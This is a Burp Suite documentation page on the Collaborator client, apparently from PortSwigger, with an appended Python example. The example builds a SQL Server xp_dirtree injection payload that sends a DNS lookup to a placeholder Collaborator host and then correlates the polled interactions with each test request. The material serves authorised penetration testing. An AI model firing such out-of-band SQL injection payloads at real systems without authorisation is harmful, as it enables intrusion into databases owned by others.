
Burp Collaborator client

Burp Collaborator client is a tool for making use of Burp Collaborator during manual testing. You can use the Collaborator client to generate payloads for use in manual testing, and poll the Collaborator server for any network interactions that result from using those payloads.

To run Burp Collaborator client, go to the Burp menu and select "Burp Collaborator client".

The following functions are available:

Please take note of the following when using the Burp Collaborator client:

Using Burp Collaborator client

In some situations, it isn't possible to trigger any noticeable effect in the application's response, either in its contents or in the time taken to receive it. In this situation, it is still possible to detect vulnerabilities by causing the application, or a back-end component it uses such as a database, to make an out-of-band network connection (for example a DNS lookup or an HTTP request) to a server the tester controls. Burp Scanner uses this technique via the Burp Collaborator feature, with the Collaborator server acting as the tester's server.

The following steps demonstrate the process of using the Collaborator client to manually verify a vulnerability based on a Collaborator interaction.

In our example, Burp Scanner has sent a payload that injects a SQL query that calls the SQL Server xp_dirtree stored procedure with a UNC file path whose host name is a subdomain of the Collaborator server. To open the path, the database must first resolve that host name, which causes a DNS lookup to the Collaborator server.

The application interacted with that domain, indicating that the injected SQL query was executed.

We can use the Collaborator client to verify this finding.

Collaborator client interaction

In our example, we've identified the Collaborator payload in the request and sent the request to Repeater.

Identifying the payload in the request

We'll need to replace the payload with a payload generated by the Collaborator client.

There is no cross-talk of payloads or interactions between separate client windows, or between the client and Burp Scanner. Hence, if you close a client window, there is no way to retrieve any further interactions resulting from its payloads, and a payload generated by the Scanner cannot be polled from the client. This is why the Scanner's payload is replaced rather than reused.

Open the Collaborator client from the Burp menu by selecting "Burp Collaborator client".

Opening Burp Collaborator client

Use the "Copy to clipboard" function to copy your payload.

Note: You can generate a specified number of Collaborator payloads and copy these to the clipboard. You can use these in manual testing, for example as a payload list in Burp Intruder or in individual Repeater requests. Each generated payload is unique, so when one payload is used per request, any interaction the client later reports can be traced back to the request that caused it.

Copy Burp Collaborator payload to clipboard

Paste the Collaborator client payload into the appropriate place in the request and send the request.

Paste the payload into the request

Use the "Poll now" function to retrieve details of any network interactions resulting from your payload.

In this example, the Collaborator server received a DNS lookup for the payload host name, confirming that the injected SQL query was executed. Note that the source IP address shown for a DNS interaction is usually that of the recursive resolver the database host uses, not the database server itself, so it should not be relied on to identify the vulnerable host. DNS is also a useful channel because outbound DNS is typically permitted even where egress filtering blocks outbound HTTP.

Polling for interactions
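The following is an added example, not code from the PortSwigger page or from Burp Suite itself. It shows how the xp_dirtree payload in the walkthrough above is assembled around a Collaborator host name, how one unique subdomain per request (the Intruder usage described in the note above) lets you trace each reported interaction back to the test case that caused it, and how to match the polled DNS interactions against the payloads you sent. The Collaborator host name `k3hzq.oast.example` and the interaction records in `SAMPLE_INTERACTIONS` are constructed placeholders, not real Collaborator output; the record field names are an assumption for this example and are not the client's own format.

```python
"""
Added example (not PortSwigger or Burp Suite code).

Builds the SQL Server xp_dirtree out-of-band payload for a Collaborator host
name and correlates polled DNS interactions back to the test case that sent
each payload. All host names and interaction records are constructed
placeholders.
"""
from urllib.parse import quote

# Constructed placeholder for a host name copied from the Collaborator client.
COLLAB_HOST = "k3hzq.oast.example"


def xp_dirtree_payload(collab_host: str, tag: str = "") -> str:
    """Return a stacked-query SQL Server injection that hands xp_dirtree a UNC
    path. The database must resolve the UNC host name before it can try to
    open the share, so the Collaborator server sees a DNS lookup even though
    outbound SMB is almost always blocked.

    `tag`, if given, is prepended as an extra label so each request gets its
    own subdomain of the Collaborator payload (e.g. for an Intruder attack)."""
    host = f"{tag}.{collab_host}" if tag else collab_host
    # A backslash needs no escaping inside a T-SQL string literal.
    return f"'; EXEC master..xp_dirtree '\\\\{host}\\share'; --"


def as_query_param(name: str, payload: str) -> str:
    """URL-encode the payload for use in a query string or form body."""
    return f"{name}={quote(payload, safe='')}"


def correlate(interactions, sent):
    """Map each sent test case (tag -> host name) to the DNS interactions that
    looked up that host name or a subdomain of it.

    Host names are case-folded because resolvers that use 0x20 case
    randomisation may report the name with mixed case, and a trailing dot
    from an absolute DNS name is stripped."""
    hits = {tag: [] for tag in sent}
    for rec in interactions:
        if rec["type"] != "DNS":
            continue
        name = rec["hostname"].lower().rstrip(".")
        for tag, host in sent.items():
            host = host.lower()
            if name == host or name.endswith("." + host):
                hits[tag].append(rec)
    return hits


# Constructed interaction records, in the shape an analyst might transcribe
# from the client's interaction list (field names are this example's own).
SAMPLE_INTERACTIONS = [
    {"type": "DNS", "hostname": "T1.k3HZq.oast.example.", "client_ip": "203.0.113.53"},
    {"type": "DNS", "hostname": "t3.k3hzq.oast.example", "client_ip": "203.0.113.53"},
    {"type": "HTTP", "hostname": "t2.k3hzq.oast.example", "client_ip": "198.51.100.7"},
]


def demo():
    """Send three tagged payloads (t1..t3) and report which triggered a DNS
    lookup. Only DNS records count here because xp_dirtree produces a name
    resolution, not an HTTP request."""
    sent = {tag: f"{tag}.{COLLAB_HOST}" for tag in ("t1", "t2", "t3")}
    params = {tag: as_query_param("id", xp_dirtree_payload(COLLAB_HOST, tag))
              for tag in sent}
    hits = correlate(SAMPLE_INTERACTIONS, sent)
    triggered = sorted(tag for tag, recs in hits.items() if recs)
    return {"params": params, "triggered": triggered, "hits": hits}


if __name__ == "__main__":
    result = demo()
    for tag, param in result["params"].items():
        print(tag, param)
    print("test cases that caused a DNS lookup:", result["triggered"])
```

The `client_ip` on a DNS record is the resolver that forwarded the query (here the placeholder `203.0.113.53` for both hits), which is why correlation is done on the host name rather than the source address. The HTTP record for `t2` is deliberately ignored: for this payload, only a name resolution proves the query ran.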